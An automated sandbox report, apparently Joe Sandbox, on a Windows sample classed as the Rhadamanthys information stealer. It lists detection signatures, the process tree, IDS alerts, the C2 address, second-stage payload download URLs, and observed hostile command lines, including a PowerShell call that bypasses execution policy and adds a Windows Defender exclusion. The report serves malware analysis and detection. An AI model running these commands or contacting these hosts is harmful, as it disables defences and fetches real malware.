Windows Analysis Report
Loader.exe

Overview

General Information

Sample name: Loader.exe
Analysis ID: 1579550
MD5: 031bafff0a790efc6955a90dafc6d0e1
SHA1: 266b3e8d18b4440330cc857df33813c4be52545a
SHA256: ee0d10d2321499903ad1b0105e27ed80cf19c595b8cd5ab2249e146d983c8495
Tags: exe, user-aachum
Infos:

Detection

RHADAMANTHYS
Score: 100
Range: 0 - 100
Whitelisted: false
Confidence: 100%

Signatures

Antivirus / Scanner detection for submitted sample
Found malware configuration
Multi AV Scanner detection for submitted file
Suricata IDS alerts for network traffic
System process connects to network (likely due to code injection or exploit)
Yara detected RHADAMANTHYS Stealer
AI detected suspicious sample
Adds a directory exclusion to Windows Defender
Bypasses PowerShell execution policy
C2 URLs / IPs found in malware configuration
Injects a PE file into a foreign processes
Loading BitLocker PowerShell Module
Overwrites Mozilla Firefox settings
Sigma detected: Powershell Base64 Encoded MpPreference Cmdlet
Switches to a custom stack to bypass stack traces
Tries to harvest and steal browser information (history, passwords, etc)
Writes to foreign memory regions
Yara detected Costura Assembly Loader
Allocates memory with a write watch (potentially for evading sandboxes)
Contains functionality for read data from the clipboard
Contains functionality to call native functions
Contains functionality to dynamically determine API calls
Contains functionality to retrieve information about pressed keystrokes
Contains functionality to shutdown / reboot the system
Contains long sleeps (>= 3 min)
Creates a process in suspended mode (likely to inject code)
Detected TCP or UDP traffic on non-standard ports
Detected potential crypto function
Drops PE files
Drops certificate files (DER)
Drops files with a non-matching file extension (content does not match file extension)
Enables debug privileges
Found a high number of Window / User specific system calls (may be a loop to detect user behavior)
Found dropped PE file which has not been started or loaded
Found evasive API chain checking for process token information
Found inlined nop instructions (likely shell or obfuscated code)
Found potential string decryption / allocating functions
HTTP GET or POST without a user agent
IP address seen in connection with other malware
Internet Provider seen in connection with other malware
JA3 SSL client fingerprint seen in connection with other malware
Launches processes in debugging mode, may be used to hinder debugging
May sleep (evasive loops) to hinder dynamic analysis
Monitors certain registry keys / values for changes (often done to protect autostart functionality)
One or more processes crash
PE file contains an invalid checksum
PE file contains sections with non-standard names
Queries sensitive processor information (via WMI, Win32_Processor, often done to detect virtual machines)
Queries the volume information (name, serial number etc) of a device
Sample execution stops while process was sleeping (likely an evasion)
Searches for user specific document files
Sigma detected: Change PowerShell Policies to an Insecure Level
Sigma detected: Explorer Process Tree Break
Sigma detected: Powershell Defender Exclusion
Sigma detected: Uncommon Svchost Parent Process
Suricata IDS alerts with low severity for network traffic
Uses 32bit PE files
Uses Microsoft's Enhanced Cryptographic Provider
Uses code obfuscation techniques (call, push, ret)
Very long cmdline option found, this is very uncommon (may be encrypted or packed)
Yara detected Keylogger Generic

Classification

  • System is w10x64
  • Loader.exe (PID: 1900 cmdline: "C:\Users\user\Desktop\Loader.exe" MD5: 031BAFFF0A790EFC6955A90DAFC6D0E1)
    • CampaignHardwareLauncher.exe (PID: 6204 cmdline: C:\Users\user\AppData\Local\Temp\CampaignHardwareLauncher\CampaignHardwareLauncher.exe MD5: ABE04EC3EDDF9D00B7E948E5404E172C)
      • javaw.exe (PID: 5908 cmdline: "C:\Users\user\AppData\Local\Temp\CampaignHardwareLauncher\ddfrt657\bin\javaw.exe" -Dfile.encoding=UTF-8 -classpath "ddfrt658\.;ddfrt658\..;ddfrt658\asm-all.jar;ddfrt658\dn-compiled-module.jar;ddfrt658\dn-php-sdk.jar;ddfrt658\gson.jar;ddfrt658\jfoenix.jar;ddfrt658\jphp-app-framework.jar;ddfrt658\jphp-core.jar;ddfrt658\jphp-desktop-ext.jar;ddfrt658\jphp-gui-ext.jar;ddfrt658\jphp-gui-jfoenix-ext.jar;ddfrt658\jphp-json-ext.jar;ddfrt658\jphp-jsoup-ext.jar;ddfrt658\jphp-runtime.jar;ddfrt658\jphp-xml-ext.jar;ddfrt658\jphp-zend-ext.jar;ddfrt658\jphp-zip-ext.jar;ddfrt658\jsoup.jar;ddfrt658\slf4j-api.jar;ddfrt658\slf4j-simple.jar;ddfrt658\zt-zip.jar" org.develnext.jphp.ext.javafx.FXLauncher MD5: 48C96771106DBDD5D42BBA3772E4B414)
        • cmd.exe (PID: 2516 cmdline: C:\Windows\system32\cmd.exe /c C:\Users\user\AppData\Local\Temp\8b774b6fbd21273c42f034e15d863942.bat MD5: D0FCE3AFA6AA1D58CE9FA336CC2B675B)
          • conhost.exe (PID: 6672 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
          • powershell.exe (PID: 1088 cmdline: powershell -inputformat none -outputformat none -NonInteractive -ExecutionPolicy Bypass -Command Add-MpPreference -ExclusionPath $env:USERPROFILE MD5: C32CA4ACFCC635EC1EA6ED8A34DF5FAC)
            • WmiPrvSE.exe (PID: 3852 cmdline: C:\Windows\system32\wbem\wmiprvse.exe -secured -Embedding MD5: 60FF40CFD7FB8FE41EE4FE9AE5FE1C51)
        • explorer.exe (PID: 3836 cmdline: explorer C:\Users\user\AppData\Local\Temp\medicalanalysispro\medicalanalysispro.exe MD5: DD6597597673F72E10C9DE7901FBA0A8)
  • explorer.exe (PID: 5244 cmdline: C:\Windows\explorer.exe /factory,{75dff2b7-6936-4c06-a8bb-676a7b00b24b} -Embedding MD5: 662F4F92FDE3557E86D110526BB578D5)
    • medicalanalysispro.exe (PID: 7164 cmdline: "C:\Users\user\AppData\Local\Temp\medicalanalysispro\medicalanalysispro.exe" MD5: 178A2A89CB76EFEA6DF50CC884991226)
      • medicalanalysis.exe (PID: 5648 cmdline: C:\Users\user\AppData\Local\Temp\IXP000.TMP\medicalanalysis.exe MD5: 443B43ADCB78164D40C977ABAC54C18E)
        • InstallUtil.exe (PID: 3148 cmdline: "C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe" MD5: 5D4073B2EB6D217C19F2B22F21BF8D57)
          • svchost.exe (PID: 6100 cmdline: "C:\Windows\System32\svchost.exe" MD5: 1ED18311E3DA35942DB37D15FA40CC5B)
            • svchost.exe (PID: 6588 cmdline: "C:\Windows\System32\svchost.exe" MD5: B7F884C1B74A263F746EE12A5F7C9F6A)
              • chrome.exe (PID: 5884 cmdline: --user-data-dir="C:\Users\user\AppData\Local\Temp\chr34F8.tmp" --explicitly-allowed-ports=8000 --disable-gpu --new-window "http://127.0.0.1:8000/446d3de0/c462449b" MD5: 45DE480806D1B5D462A7DDE4DCEFC4E4)
                • chrome.exe (PID: 6780 cmdline: "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-GB --service-sandbox-type=none --mojo-platform-channel-handle=2864 --field-trial-handle=2760,i,8911409876451875060,10497288921933201454,262144 /prefetch:8 MD5: 45DE480806D1B5D462A7DDE4DCEFC4E4)
              • msedge.exe (PID: 4760 cmdline: --user-data-dir="C:\Users\user\AppData\Local\Temp\chr417C.tmp" --explicitly-allowed-ports=8000 --disable-gpu --new-window "http://127.0.0.1:8000/446d3de0/c7af6c55" MD5: 69222B8101B0601CC6663F8381E7E00F)
                • msedge.exe (PID: 2020 cmdline: "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-GB --service-sandbox-type=none --mojo-platform-channel-handle=3232 --field-trial-handle=2952,i,15376106981167102888,3693365573348808806,262144 /prefetch:3 MD5: 69222B8101B0601CC6663F8381E7E00F)
              • wmplayer.exe (PID: 7388 cmdline: "C:\Program Files\Windows Media Player\wmplayer.exe" MD5: 89DCD2D4C0EC638AADC00D3530E07E1D)
          • WerFault.exe (PID: 3252 cmdline: C:\Windows\SysWOW64\WerFault.exe -u -p 3148 -s 348 MD5: C31336C1EFC2CCB44B4326EA793040F2)
      • medicallanalysis.exe (PID: 5796 cmdline: C:\Users\user\AppData\Local\Temp\IXP000.TMP\medicallanalysis.exe MD5: 2DBC39DCE4C3B66019E84A28A342EAD0)
        • cmd.exe (PID: 3792 cmdline: "cmd.exe" /C timeout 1 && del "C:\Users\user\AppData\Local\Temp\IXP000.TMP\medicallanalysis.exe" MD5: D0FCE3AFA6AA1D58CE9FA336CC2B675B)
          • conhost.exe (PID: 3992 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
          • timeout.exe (PID: 6984 cmdline: timeout 1 MD5: 976566BEEFCCA4A159ECBDB2D4B1A3E3)
  • cleanup
Name: Rhadamanthys
Description: According to PCrisk, Rhadamanthys is a stealer-type malware, and as its name implies - it is designed to extract data from infected machines. At the time of writing, this malware is spread through malicious websites mirroring those of genuine software such as AnyDesk, Zoom, Notepad++, and others. Rhadamanthys is downloaded alongside the real program, thus diminishing immediate user suspicion. These sites were promoted through Google ads, which superseded the legitimate search results on the Google search engine.
Attribution: Sandworm
Link: https://malpedia.caad.fkie.fraunhofer.de/details/win.rhadamanthys
{"C2 url": "https://104.37.175.218:7982/da03ab84e7f8187e6/v3iuaiea.tsf2o"}
Source | Rule | Description | Author | Strings
00000010.00000003.2844637112.0000000004D10000.00000004.00000001.00020000.00000000.sdmp | JoeSecurity_Keylogger_Generic | Yara detected Keylogger Generic | Joe Security |
00000010.00000003.2840379092.00000000003E0000.00000004.00001000.00020000.00000000.sdmp | JoeSecurity_RHADAMANTHYS | Yara detected RHADAMANTHYS Stealer | Joe Security |
0000000D.00000002.2831006942.00000000026E7000.00000004.00000800.00020000.00000000.sdmp | JoeSecurity_CosturaAssemblyLoader | Yara detected Costura Assembly Loader | Joe Security |
00000010.00000003.2844199525.0000000004AF0000.00000004.00000001.00020000.00000000.sdmp | JoeSecurity_Keylogger_Generic | Yara detected Keylogger Generic | Joe Security |
00000010.00000002.2935727529.0000000002BF0000.00000040.00001000.00020000.00000000.sdmp | JoeSecurity_RHADAMANTHYS | Yara detected RHADAMANTHYS Stealer | Joe Security |

Source | Rule | Description | Author | Strings
13.2.medicalanalysis.exe.5940000.6.raw.unpack | JoeSecurity_CosturaAssemblyLoader | Yara detected Costura Assembly Loader | Joe Security |
16.3.svchost.exe.4af0000.6.raw.unpack | JoeSecurity_Keylogger_Generic | Yara detected Keylogger Generic | Joe Security |
16.3.svchost.exe.4d10000.7.raw.unpack | JoeSecurity_Keylogger_Generic | Yara detected Keylogger Generic | Joe Security |
16.3.svchost.exe.4d10000.7.unpack | JoeSecurity_Keylogger_Generic | Yara detected Keylogger Generic | Joe Security |

                    System Summary

                    Source: Process startedAuthor: Florian Roth (Nextron Systems): Data: Command: powershell -inputformat none -outputformat none -NonInteractive -ExecutionPolicy Bypass -Command Add-MpPreference -ExclusionPath $env:USERPROFILE, CommandLine: powershell -inputformat none -outputformat none -NonInteractive -ExecutionPolicy Bypass -Command Add-MpPreference -ExclusionPath $env:USERPROFILE, CommandLine|base64offset|contains: ^, Image: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, NewProcessName: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, OriginalFileName: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, ParentCommandLine: C:\Windows\system32\cmd.exe /c C:\Users\user\AppData\Local\Temp\8b774b6fbd21273c42f034e15d863942.bat, ParentImage: C:\Windows\SysWOW64\cmd.exe, ParentProcessId: 2516, ParentProcessName: cmd.exe, ProcessCommandLine: powershell -inputformat none -outputformat none -NonInteractive -ExecutionPolicy Bypass -Command Add-MpPreference -ExclusionPath $env:USERPROFILE, ProcessId: 1088, ProcessName: powershell.exe
                    Source: Process startedAuthor: frack113: Data: Command: powershell -inputformat none -outputformat none -NonInteractive -ExecutionPolicy Bypass -Command Add-MpPreference -ExclusionPath $env:USERPROFILE, CommandLine: powershell -inputformat none -outputformat none -NonInteractive -ExecutionPolicy Bypass -Command Add-MpPreference -ExclusionPath $env:USERPROFILE, CommandLine|base64offset|contains: ^, Image: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, NewProcessName: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, OriginalFileName: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, ParentCommandLine: C:\Windows\system32\cmd.exe /c C:\Users\user\AppData\Local\Temp\8b774b6fbd21273c42f034e15d863942.bat, ParentImage: C:\Windows\SysWOW64\cmd.exe, ParentProcessId: 2516, ParentProcessName: cmd.exe, ProcessCommandLine: powershell -inputformat none -outputformat none -NonInteractive -ExecutionPolicy Bypass -Command Add-MpPreference -ExclusionPath $env:USERPROFILE, ProcessId: 1088, ProcessName: powershell.exe
                    Source: Process startedAuthor: Florian Roth (Nextron Systems), Nasreddine Bencherchali (Nextron Systems), @gott_cyber: Data: Command: C:\Windows\explorer.exe /factory,{75dff2b7-6936-4c06-a8bb-676a7b00b24b} -Embedding, CommandLine: C:\Windows\explorer.exe /factory,{75dff2b7-6936-4c06-a8bb-676a7b00b24b} -Embedding, CommandLine|base64offset|contains: Iyb, Image: C:\Windows\explorer.exe, NewProcessName: C:\Windows\explorer.exe, OriginalFileName: C:\Windows\explorer.exe, ParentCommandLine: , ParentImage: , ParentProcessId: 752, ProcessCommandLine: C:\Windows\explorer.exe /factory,{75dff2b7-6936-4c06-a8bb-676a7b00b24b} -Embedding, ProcessId: 5244, ProcessName: explorer.exe
                    Source: Process startedAuthor: Florian Roth (Nextron Systems): Data: Command: "C:\Windows\System32\svchost.exe", CommandLine: "C:\Windows\System32\svchost.exe", CommandLine|base64offset|contains: , Image: C:\Windows\SysWOW64\svchost.exe, NewProcessName: C:\Windows\SysWOW64\svchost.exe, OriginalFileName: C:\Windows\SysWOW64\svchost.exe, ParentCommandLine: "C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe", ParentImage: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe, ParentProcessId: 3148, ParentProcessName: InstallUtil.exe, ProcessCommandLine: "C:\Windows\System32\svchost.exe", ProcessId: 6100, ProcessName: svchost.exe
                    Source: Process startedAuthor: Roberto Rodriguez @Cyb3rWard0g (rule), oscd.community (improvements): Data: Command: powershell -inputformat none -outputformat none -NonInteractive -ExecutionPolicy Bypass -Command Add-MpPreference -ExclusionPath $env:USERPROFILE, CommandLine: powershell -inputformat none -outputformat none -NonInteractive -ExecutionPolicy Bypass -Command Add-MpPreference -ExclusionPath $env:USERPROFILE, CommandLine|base64offset|contains: ^, Image: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, NewProcessName: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, OriginalFileName: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, ParentCommandLine: C:\Windows\system32\cmd.exe /c C:\Users\user\AppData\Local\Temp\8b774b6fbd21273c42f034e15d863942.bat, ParentImage: C:\Windows\SysWOW64\cmd.exe, ParentProcessId: 2516, ParentProcessName: cmd.exe, ProcessCommandLine: powershell -inputformat none -outputformat none -NonInteractive -ExecutionPolicy Bypass -Command Add-MpPreference -ExclusionPath $env:USERPROFILE, ProcessId: 1088, ProcessName: powershell.exe
                    Source: Process startedAuthor: vburov: Data: Command: "C:\Windows\System32\svchost.exe", CommandLine: "C:\Windows\System32\svchost.exe", CommandLine|base64offset|contains: , Image: C:\Windows\SysWOW64\svchost.exe, NewProcessName: C:\Windows\SysWOW64\svchost.exe, OriginalFileName: C:\Windows\SysWOW64\svchost.exe, ParentCommandLine: "C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe", ParentImage: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe, ParentProcessId: 3148, ParentProcessName: InstallUtil.exe, ProcessCommandLine: "C:\Windows\System32\svchost.exe", ProcessId: 6100, ProcessName: svchost.exe
                    Timestamp | SID | Severity | Classtype | Source IP | Source Port | Destination IP | Destination Port | Protocol
                    2024-12-22T23:54:57.147487+0100 | 2854824 | 2 | Potentially Bad Traffic | 104.37.175.218 | 7982 | 192.168.2.5 | 49929 | TCP
                    2024-12-22T23:55:08.286084+0100 | 2854824 | 2 | Potentially Bad Traffic | 104.37.175.218 | 7982 | 192.168.2.5 | 49959 | TCP

                    Timestamp | SID | Severity | Classtype | Source IP | Source Port | Destination IP | Destination Port | Protocol
                    2024-12-22T23:54:30.170802+0100 | 2854802 | 1 | Domain Observed Used for C2 Detected | 104.37.175.218 | 7982 | 192.168.2.5 | 49859 | TCP
                    2024-12-22T23:54:57.147487+0100 | 2854802 | 1 | Domain Observed Used for C2 Detected | 104.37.175.218 | 7982 | 192.168.2.5 | 49929 | TCP
                    2024-12-22T23:55:08.286084+0100 | 2854802 | 1 | Domain Observed Used for C2 Detected | 104.37.175.218 | 7982 | 192.168.2.5 | 49959 | TCP

                    AV Detection

                    Source: Loader.exe | Avira: detected
                    Source: 13.2.medicalanalysis.exe.3840c28.0.raw.unpack | Malware Configuration Extractor: Rhadamanthys {"C2 url": "https://104.37.175.218:7982/da03ab84e7f8187e6/v3iuaiea.tsf2o"}
                    Source: Loader.exe | Virustotal: Detection: 27%
                    Source: Loader.exe | ReversingLabs: Detection: 23%
                    Source: Submited Sample | Integrated Neural Analysis Model: Matched 99.8% probability
                    Source: C:\Users\user\AppData\Local\Temp\medicalanalysispro\medicalanalysispro.exeCode function: 12_2_00007FF7600A30EC GetSystemDirectoryA,LoadLibraryA,GetProcAddress,DecryptFileA,FreeLibrary,GetWindowsDirectoryA,SetCurrentDirectoryA,12_2_00007FF7600A30EC
                    Source: Loader.exeStatic PE information: EXECUTABLE_IMAGE, 32BIT_MACHINE
                    Source: C:\Users\user\Desktop\Loader.exe | File created: C:\Users\user\AppData\Local\Temp\CampaignHardwareLauncher\ddfrt657\README.txt
                    Source: C:\Users\user\Desktop\Loader.exe | File created: C:\Users\user\AppData\Local\Temp\CampaignHardwareLauncher\ddfrt657\THIRDPARTYLICENSEREADME-JAVAFX.txt
                    Source: C:\Users\user\Desktop\Loader.exe | File created: C:\Users\user\AppData\Local\Temp\CampaignHardwareLauncher\ddfrt657\THIRDPARTYLICENSEREADME.txt
                    Source: C:\Users\user\AppData\Local\Temp\CampaignHardwareLauncher\ddfrt657\bin\javaw.exe | File opened: C:\Users\user\AppData\Local\Temp\CampaignHardwareLauncher\ddfrt657\bin\msvcr100.dll
                    Source: unknownHTTPS traffic detected: 5.2.81.126:443 -> 192.168.2.5:49736 version: TLS 1.2
                    Source: Loader.exeStatic PE information: DYNAMIC_BASE, NX_COMPAT, NO_SEH, TERMINAL_SERVER_AWARE
                    Source: Binary string: c:\re\workspace\8-2-build-windows-i586-cygwin\jdk8u101\7261\build\windows-i586\jdk\objs\libawt\awt.pdb8^(kdw&k source: javaw.exe, 00000003.00000002.4549234661.000000006B249000.00000002.00000001.01000000.00000014.sdmp
                    Source: Binary string: msvcr100.i386.pdb source: javaw.exe, 00000003.00000002.4553754247.000000006C301000.00000020.00000001.01000000.00000008.sdmp
                    Source: Binary string: c:\re\workspace\8-2-build-windows-i586-cygwin\jdk8u101\7261\build\windows-i586\jdk\objs\libnio\nio.pdb source: javaw.exe, 00000003.00000002.4551278707.000000006BE77000.00000002.00000001.01000000.0000000E.sdmp
                    Source: Binary string: c:\re\workspace\8-2-build-windows-i586-cygwin\jdk8u101\7261\build\windows-i586\jdk\objs\libjava\java.pdb source: javaw.exe, 00000003.00000002.4552068701.000000006BF13000.00000002.00000001.01000000.0000000B.sdmp
                    Source: Binary string: c:\re\workspace\8-2-build-windows-i586-cygwin\jdk8u101\7261\build\windows-i586\jdk\objs\libnio\nio.pdbic source: javaw.exe, 00000003.00000002.4551278707.000000006BE77000.00000002.00000001.01000000.0000000E.sdmp
                    Source: Binary string: c:\re\workspace\8-2-build-windows-i586-cygwin\jdk8u101\7261\build\windows-i586\jdk\objs\libjava\java.pdb'% source: javaw.exe, 00000003.00000002.4552068701.000000006BF13000.00000002.00000001.01000000.0000000B.sdmp
                    Source: Binary string: c:\re\workspace\8-2-build-windows-i586-cygwin\jdk8u101\7261\build\windows-i586\jdk\objs\libzip\zip.pdb source: javaw.exe, 00000003.00000002.4551788732.000000006BEEA000.00000002.00000001.01000000.0000000C.sdmp
                    Source: Binary string: msvcp120.i386.pdb source: javaw.exe, 00000003.00000002.4550390578.000000006BD01000.00000020.00000001.01000000.00000010.sdmp
                    Source: Binary string: c:\re\workspace\8-2-build-windows-i586-cygwin\jdk8u101\7261\build\windows-i586\jdk\objs\libawt\awt.pdb source: javaw.exe, 00000003.00000002.4549234661.000000006B249000.00000002.00000001.01000000.00000014.sdmp
                    Source: Binary string: c:\re\workspace\8-2-build-windows-i586-cygwin\jdk8u101\7261\build\windows-i586\jdk\objs\libnet\net.pdb source: javaw.exe, 00000003.00000002.4551504864.000000006BECD000.00000002.00000001.01000000.0000000D.sdmp
                    Source: Binary string: C:\Users\dahall\Documents\GitHubRepos\TaskScheduler\TaskService\obj\Release\net40\Microsoft.Win32.TaskScheduler.pdb source: medicalanalysis.exe
                    Source: Binary string: C:\Users\devuser\Documents\Visual Studio 2017\Projects\IBuilder\Release\NAct.pdb source: Loader.exe, 00000000.00000002.2224726858.0000000000420000.00000004.00000001.01000000.00000003.sdmp
                    Source: Binary string: c:\re\workspace\8-2-build-windows-i586-cygwin\jdk8u101\7261\build\windows-i586\jdk\objs\javaw_objs\javaw.pdb source: javaw.exe, 00000003.00000000.2174031864.000000000075C000.00000002.00000001.01000000.00000007.sdmp, javaw.exe, 00000003.00000002.4531740229.000000000075C000.00000002.00000001.01000000.00000007.sdmp
                    Source: C:\Users\user\Desktop\Loader.exeCode function: 0_2_00406301 FindFirstFileW,FindClose,0_2_00406301
                    Source: C:\Users\user\Desktop\Loader.exeCode function: 0_2_00406CC7 DeleteFileW,lstrcatW,lstrcatW,lstrcatW,lstrlenW,FindFirstFileW,DeleteFileW,FindNextFileW,FindClose,RemoveDirectoryW,0_2_00406CC7
                    Source: C:\Users\user\AppData\Local\Temp\medicalanalysispro\medicalanalysispro.exeCode function: 12_2_00007FF7600A204C FindFirstFileA,lstrcmpA,lstrcmpA,SetFileAttributesA,DeleteFileA,FindNextFileA,FindClose,RemoveDirectoryA,12_2_00007FF7600A204C
                    Source: C:\Users\user\Desktop\Loader.exe | File opened: C:\Users\user\AppData\Local\Temp\CampaignHardwareLauncher\ddfrt657\
                    Source: C:\Users\user\Desktop\Loader.exe | File opened: C:\Users\user\AppData\Local\
                    Source: C:\Users\user\Desktop\Loader.exe | File opened: C:\Users\user\AppData\
                    Source: C:\Users\user\Desktop\Loader.exe | File opened: C:\Users\user\
                    Source: C:\Users\user\Desktop\Loader.exe | File opened: C:\Users\user\AppData\Local\Temp\CampaignHardwareLauncher\
                    Source: C:\Users\user\Desktop\Loader.exe | File opened: C:\Users\user\AppData\Local\Temp\CampaignHardwareLauncher\ddfrt657\bin\client
                    Source: C:\Users\user\AppData\Local\Temp\IXP000.TMP\medicalanalysis.exeCode function: 4x nop then mov dword ptr [ebp-20h], 00000000h13_2_04AA0DE0
                    Source: C:\Users\user\AppData\Local\Temp\IXP000.TMP\medicalanalysis.exeCode function: 4x nop then mov dword ptr [ebp-20h], 00000000h13_2_04AA0DD5
                    Source: C:\Users\user\AppData\Local\Temp\IXP000.TMP\medicalanalysis.exeCode function: 4x nop then jmp 0571DE68h13_2_0571DDB0
                    Source: C:\Users\user\AppData\Local\Temp\IXP000.TMP\medicalanalysis.exeCode function: 4x nop then jmp 0571DE68h13_2_0571DDA8
                    Source: C:\Users\user\AppData\Local\Temp\IXP000.TMP\medicalanalysis.exeCode function: 4x nop then jmp 05A37BD0h13_2_05A37B50
                    Source: C:\Users\user\AppData\Local\Temp\IXP000.TMP\medicalanalysis.exeCode function: 4x nop then jmp 05A37BD0h13_2_05A37B17
                    Source: chrome.exeMemory has grown: Private usage: 1MB later: 21MB

                    Networking

                    Source: Network trafficSuricata IDS: 2854802 - Severity 1 - ETPRO MALWARE Suspected Rhadamanthys Related SSL Cert : 104.37.175.218:7982 -> 192.168.2.5:49859
                    Source: Network trafficSuricata IDS: 2854802 - Severity 1 - ETPRO MALWARE Suspected Rhadamanthys Related SSL Cert : 104.37.175.218:7982 -> 192.168.2.5:49929
                    Source: Network trafficSuricata IDS: 2854802 - Severity 1 - ETPRO MALWARE Suspected Rhadamanthys Related SSL Cert : 104.37.175.218:7982 -> 192.168.2.5:49959
                    Source: C:\Windows\SysWOW64\svchost.exeNetwork Connect: 104.37.175.218 7982
                    Source: Malware configuration extractorURLs: https://104.37.175.218:7982/da03ab84e7f8187e6/v3iuaiea.tsf2o
                    Source: global trafficTCP traffic: 192.168.2.5:49859 -> 104.37.175.218:7982
                    Source: global trafficHTTP traffic detected: GET /temp/Nomrwfj.mp4 HTTP/1.1Host: erdogansigorta.comConnection: Keep-Alive
                    Source: Joe Sandbox ViewIP Address: 213.239.239.164 213.239.239.164
                    Source: Joe Sandbox ViewIP Address: 194.58.203.20 194.58.203.20
                    Source: Joe Sandbox ViewASN Name: MAJESTIC-HOSTING-01US MAJESTIC-HOSTING-01US
                    Source: Joe Sandbox ViewJA3 fingerprint: 3b5074b1b5d032e5620f69f9f700ff0e
                    Source: Network trafficSuricata IDS: 2854824 - Severity 2 - ETPRO JA3 HASH Suspected Malware Related Response : 104.37.175.218:7982 -> 192.168.2.5:49929
                    Source: Network trafficSuricata IDS: 2854824 - Severity 2 - ETPRO JA3 HASH Suspected Malware Related Response : 104.37.175.218:7982 -> 192.168.2.5:49959
                    Source: unknownTCP traffic detected without corresponding DNS query: 77.238.245.43
                    Source: global trafficHTTP traffic detected: HTTP/1.1 200 OKDate: Sun, 22 Dec 2024 22:53:33 GMTServer: Apache/2.4.58 (Ubuntu)Last-Modified: Sun, 15 Dec 2024 14:19:18 GMTETag: "25a7f-6294fbfd8df7a"Accept-Ranges: bytesContent-Length: 154239Keep-Alive: timeout=5, max=100Connection: Keep-AliveContent-Type: application/zip
                    Source: global trafficHTTP traffic detected: GET /temp/Nomrwfj.mp4 HTTP/1.1Host: erdogansigorta.comConnection: Keep-Alive
                    Source: global trafficHTTP traffic detected: GET /tamus/medicalanalysispro.zip HTTP/1.1User-Agent: Java/1.8.0_101Host: 77.238.245.43Accept: text/html, image/gif, image/jpeg, *; q=.2, */*; q=.2Connection: keep-alive
                    Source: global trafficDNS traffic detected: DNS query: erdogansigorta.com
                    Source: global trafficDNS traffic detected: DNS query: ntp.time.in.ua
                    Source: global trafficDNS traffic detected: DNS query: ntp1.net.berkeley.edu
                    Source: global trafficDNS traffic detected: DNS query: gbg1.ntp.se
                    Source: global trafficDNS traffic detected: DNS query: x.ns.gin.ntt.net
                    Source: global trafficDNS traffic detected: DNS query: ntp.time.nl
                    Source: global trafficDNS traffic detected: DNS query: ntp1.hetzner.de
                    Source: global trafficDNS traffic detected: DNS query: chrome.cloudflare-dns.com
                    Source: msedge.exe, 0000001B.00000002.3174477570.00004D3C002D4000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://127.0.0.1:8000/446d3de0/c7af6c55
                    Source: javaw.exe, 00000003.00000002.4539258471.000000000ACF5000.00000004.00001000.00020000.00000000.sdmp, javaw.exe, 00000003.00000002.4545639440.0000000016A16000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://77.238.245.43/tamus/medicalanalysispro.zip
                    Source: javaw.exe, 00000003.00000002.4539258471.000000000A863000.00000004.00001000.00020000.00000000.sdmp, javaw.exe, 00000003.00000002.4543801058.00000000159A0000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://apache.org/xml/features/
                    Source: javaw.exe, 00000003.00000002.4539258471.000000000A863000.00000004.00001000.00020000.00000000.sdmp, javaw.exe, 00000003.00000002.4543801058.00000000159A0000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://apache.org/xml/features/allow-java-encodings
                    Source: javaw.exe, 00000003.00000002.4539258471.000000000A863000.00000004.00001000.00020000.00000000.sdmp, javaw.exe, 00000003.00000002.4543801058.00000000159A0000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://apache.org/xml/features/continue-after-fatal-error
                    Source: javaw.exe, 00000003.00000002.4539258471.000000000A863000.00000004.00001000.00020000.00000000.sdmp, javaw.exe, 00000003.00000003.2336673647.00000000152CE000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://apache.org/xml/features/create-cdata-nodes
                    Source: javaw.exe, 00000003.00000002.4539258471.000000000A863000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: http://apache.org/xml/features/disallow-doctype-decl
                    Source: javaw.exe, 00000003.00000003.2231217783.0000000015AE2000.00000004.00000020.00020000.00000000.sdmp, javaw.exe, 00000003.00000003.3001038964.0000000015AD9000.00000004.00000020.00020000.00000000.sdmp, javaw.exe, 00000003.00000003.2228038429.0000000015A77000.00000004.00000020.00020000.00000000.sdmp, javaw.exe, 00000003.00000003.2335885806.0000000015A77000.00000004.00000020.00020000.00000000.sdmp, javaw.exe, 00000003.00000002.4543801058.0000000015A77000.00000004.00000020.00020000.00000000.sdmp, javaw.exe, 00000003.00000003.3003103430.0000000015AD9000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://apache.org/xml/features/disallow-doctype-declinte
                    Source: javaw.exe, 00000003.00000002.4539258471.000000000A863000.00000004.00001000.00020000.00000000.sdmp, javaw.exe, 00000003.00000003.2336673647.00000000152CE000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://apache.org/xml/features/dom/create-entity-ref-nodes
                    Source: javaw.exe, 00000003.00000002.4539258471.000000000A863000.00000004.00001000.00020000.00000000.sdmp, javaw.exe, 00000003.00000002.4543801058.00000000159A0000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://apache.org/xml/features/dom/defer-node-expansion
